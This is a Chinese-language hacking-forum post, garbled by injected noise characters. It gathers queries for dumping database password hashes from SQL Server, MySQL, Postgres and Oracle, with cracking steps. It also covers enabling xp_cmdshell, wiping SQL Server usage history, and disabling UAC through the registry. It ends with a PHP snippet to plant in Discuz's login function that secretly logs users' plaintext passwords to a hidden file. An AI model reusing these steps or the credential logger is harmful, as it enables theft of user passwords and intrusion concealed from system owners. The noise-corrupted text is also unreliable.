. \1 O f6 y$ m* }) V. H9 B;antian365.asp;antian365.jpg$ Q3 Y5 a3 u, R" _
# Y5 T# V) h4 ^0 C1 l各种类型数据库抓HASH破解最高权限密码!& I. e0 }: z1 B6 m: k' H$ ] \9 t. {
1.sql server2000; B' E6 Z& n6 q% |1 f# ?% T M
SELECT password from master.dbo.sysxlogins where name='sa'# l- f0 F" g# ]; d4 W- w5 C
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341! f$ } T6 G# q
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A" Z' j8 ~/ o4 n# {6 C& W
) C4 M; g. R/ o) N$ o9 c
0×0100- constant header; w! \8 V( S' u k- E* O
34767D5C- salt% \$ U. `9 ~4 K; q% l+ U$ T
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
" J* X- e$ J( W, T; T9 Q2 }+ C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
' G# B& p) U" P0 {- L" h2 @; l0 @crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
; D: ]. o+ }5 ?& \ }8 WSQL server 2005:-8 e' Q6 i8 X1 s( I; t# G' K
SELECT password_hash FROM sys.sql_logins where name='sa'
; f x. G" O! s' M. ^5 T0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
% g9 V1 g0 s) Z5 f: M4 U6 \ n0×0100- constant header: J3 g! u1 L7 b, f( X) U: z2 {- ^; a
993BF231-salt
* ^& U- g" f% U/ y8 S3 A5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
# P- W1 ^. l0 mcrack case sensitive hash in cain, try brute force and dictionary based attacks.# k G' @; m0 u2 ?6 R
! V$ m% e( s4 I) `$ N9 nupdate:- following bernardo’s comments:-/ x$ G* [" f! S
use function fn_varbintohexstr() to cast password in a hex string.; f/ ~! K" [3 D0 Z4 G) f0 \+ f' P
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins. T" r# O& k: Z& r \
) g# i: U8 b9 A! K4 U
MYSQL:-
: b+ }0 W) u- e3 A# T) ]# {* \+ {0 [7 d) j. g( s7 Y
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2." O/ W: O9 I5 c, b7 a z
$ P! g# ~* [/ `8 ]9 E6 n*mysql < 4.10 Q" H( q+ \! w$ V+ E- @
; S5 I% \( B3 B/ w1 Bmysql> SELECT PASSWORD(‘mypass’);5 d" `8 W; E' Y( D
+——————–+
6 `. k5 N2 P/ d' S& P| PASSWORD(‘mypass’) |
. U* O, _0 x/ A) I/ c& w; x, A+——————–+, b+ U- G, Z/ L$ l
| 6f8c114b58f2ce9e |+ B* T& @4 C, q5 W- j
+——————–+9 @2 o( O9 w2 F& v, q" f1 A
& b) l/ j8 O% N$ b5 C
*mysql >=4.1
5 w. M4 N2 }# s* d$ [8 [6 q6 A: r/ \$ I8 z$ Y- q* O, Y- v8 c- E
mysql> SELECT PASSWORD(‘mypass’);
3 n, c c0 W+ V% h+ g. G; }1 \+——————————————-+
+ c9 }, M: e7 }4 G! R| PASSWORD(‘mypass’) |
4 e8 n5 v* a( H) Y6 H+——————————————-+6 `. c T+ @* w, C! M% }& R I
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
% l: ~- Y( E, W# U4 q; R& h; f" p+——————————————-+2 g, U6 M6 I- ~7 I" r m
7 _% ^" g5 V) OSelect user, password from mysql.user
% C2 ?9 y( m1 R4 {- {5 h! `: cThe hashes can be cracked in ‘cain and abel’3 c2 j. T; B" x, b* O/ J6 R
3 x+ Q6 M9 ] ?7 @) w K. z
Postgres:-
" Y$ a( P2 g% D; Y8 Z6 J) `" YPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
' W7 z' y, a) _" N/ ?* Cselect usename, passwd from pg_shadow;9 L& U( r: f. Y5 T
usename | passwd
8 o9 G3 y/ M6 F, p——————+————————————-
. K0 v E$ R0 e" }! |) S9 Ntestuser | md5fabb6d7172aadfda4753bf0507ed43964 g1 K- z; n- p: q
use mdcrack to crack these hashes:-& y' P6 G9 g0 X1 T9 H! ]
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
7 q. K2 f' u3 s# v- ~, r% B- X% \: a, k
Oracle:-1 k1 f6 w8 `* a: O5 p
select name, password, spare4 from sys.user$- @# \1 J- Q; F5 e1 ~
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g9 U- V" U1 f% f
More on Oracle later, i am a bit bored….
6 G) A& [! h0 V9 L7 U1 h) u
! A( j& z+ c/ v1 A, \$ O6 K% _% d; a7 g6 N* U& I( V+ x
在sql server2005/2008中开启xp_cmdshell
2 P( s' ]& S+ d" \! N1 C( }-- To allow advanced options to be changed.
9 w! O1 m5 j9 s: S4 IEXEC sp_configure 'show advanced options', 1- g" X4 c$ @1 U" o+ b3 J8 t1 Y. x
GO
) l* e, W9 r1 {0 ^-- To update the currently configured value for advanced options.
: B0 U- u$ l8 V/ G1 m& ^RECONFIGURE2 U4 K/ V, k* r, n" a1 G3 G: E
GO
. y; q7 ~2 \+ I+ x7 u# x-- To enable the feature.
% n- l; l Y. ?: H8 X3 CEXEC sp_configure 'xp_cmdshell', 15 v8 [3 A# O. {& T$ c- U' O* T) z
GO! D* p$ `4 Z! L
-- To update the currently configured value for this feature.8 n" \& e+ S. [
RECONFIGURE
" U7 ] J+ e( o- v0 JGO) }+ W# K' L( l
SQL 2008 server日志清除,在清楚前一定要备份。( k9 p3 f! [ l' Y, i
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
) G4 T* ~' L5 @8 }X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin) _* s0 p7 p3 ]9 r0 {0 D5 m5 I
& G/ M3 u {/ Q
对于SQL Server 2008以前的版本:
& h3 q& C) F% k7 s8 p s1 V4 }! ^+ QSQL Server 2005:
3 D3 O! b/ f/ j6 f7 D删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat% v( F* z$ o3 k
SQL Server 2000:0 [8 K) @4 Q/ C/ u
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
; I# b- d5 [1 }6 U, Y7 U/ ^& w l4 J
本帖最后由 simeon 于 2013-1-3 09:51 编辑
6 `& L& I. j8 Z
# E. g- i. X, R' q9 a$ w9 G. O
7 m# i ]1 i- Vwindows 2008 文件权限修改- G4 D( ^) n& e S8 j& k
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
: E/ Z4 p! R+ m2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad983 l" q4 c( d' h/ V* [4 ]" R
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,' S- ]2 \; y/ ~# f! B2 J
# k# X4 y3 Z7 d* b4 n
Windows Registry Editor Version 5.00
5 G+ u. G1 l4 n; P- M7 n) ][HKEY_CLASSES_ROOT\*\shell\runas]
+ @8 L+ S0 U" V@="管理员取得所有权"5 L( k0 g: K8 w1 J$ e) q
"NoWorkingDirectory"=""/ T3 W( J5 U% R+ m
[HKEY_CLASSES_ROOT\*\shell\runas\command]
H; c! Q" {$ t$ { g, V@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ D3 ]+ i* G) o7 g"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! A( `& V" I) l8 m- d; E- Q
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
7 V4 ~1 U) u. X' U@="管理员取得所有权"
( T& K: r* k9 x$ V"NoWorkingDirectory"=""& O+ W( Q9 C, W$ o
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
" v3 c3 n2 w6 c, s5 `, n$ p@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( X0 O3 K+ g0 y) Y: W2 L( _$ i
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 n. M, Q2 a+ j+ B+ l; S3 i5 L% }: Y" }
[HKEY_CLASSES_ROOT\Directory\shell\runas]' e/ E' s( e' F& F9 |) b# b
@="管理员取得所有权"
: [" A x5 ` A; Z; R$ S"NoWorkingDirectory"=""3 M* H4 }- G4 c7 B# F5 {1 t6 ~
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
( }9 W D% x2 E8 U% I7 F& d+ v7 W@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
0 h0 y7 ]% ?' l8 i9 A"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
A9 S3 [" y0 d0 ^* d+ K4 I( d3 [7 \7 z9 ]% P& ]9 B n) ^
' X) |1 m# K) k. e
win7右键“管理员取得所有权”.reg导入
7 o( O* Q% \' g5 z: [二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,: a3 G, J9 T/ s' w) E Q- ^0 A
1、C:\Windows这个路径的“notepad.exe”不需要替换
' v) b6 T, }) Y2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
2 n0 f! x7 G! Z' _% I( R3、四个“notepad.exe.mui”不要管6 ~ ^1 H+ p& J0 ]- @
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
8 n$ l6 g+ |+ x; X" [C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”9 x4 U0 H3 f( x; u5 l
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
" g2 G1 Q( h8 {, T% y1 M替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
8 K4 C; S) f1 P8 }1 z3 r* O3 q+ `, Awindows 2008中关闭安全策略: & b1 A( }- i }9 M8 i6 h
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
, F, v6 {; k2 J, m+ T* v8 N. a修改uc_client目录下的client.php 在
" f4 D6 I( u; Y; j' L. j" tfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {4 F% X R+ {) k9 p0 v" z
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php1 Y; g3 b2 J7 H
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
! h' b; l( Q2 G3 Qif(getenv('HTTP_CLIENT_IP')) {
& L* ?3 E$ h4 p* C5 J3 ?$onlineip = getenv('HTTP_CLIENT_IP');
$ @0 S: c: N5 \7 S3 Y. p0 V} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
. N4 W- Q" @! g+ S! Y" B1 r5 z$onlineip = getenv('HTTP_X_FORWARDED_FOR');( `" t4 I5 q- Y6 e/ d: U1 ?6 P
} elseif(getenv('REMOTE_ADDR')) {
2 O4 w7 O# m% r: t$onlineip = getenv('REMOTE_ADDR');: G7 d% H" B( P& D
} else {9 {! u- @% S4 \2 b
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];9 j2 r! [+ k4 _( f, S/ @
}; v: b4 e, d& C6 N' M" t2 s+ M2 w
$showtime=date("Y-m-d H:i:s");
, J' @2 ^9 k6 S0 }( _* j6 ] $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
; Z g* a2 S8 _$ ?+ j $handle=fopen('./data/cache/csslog.php','a+');9 u. W# |, |$ Q3 R; K
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对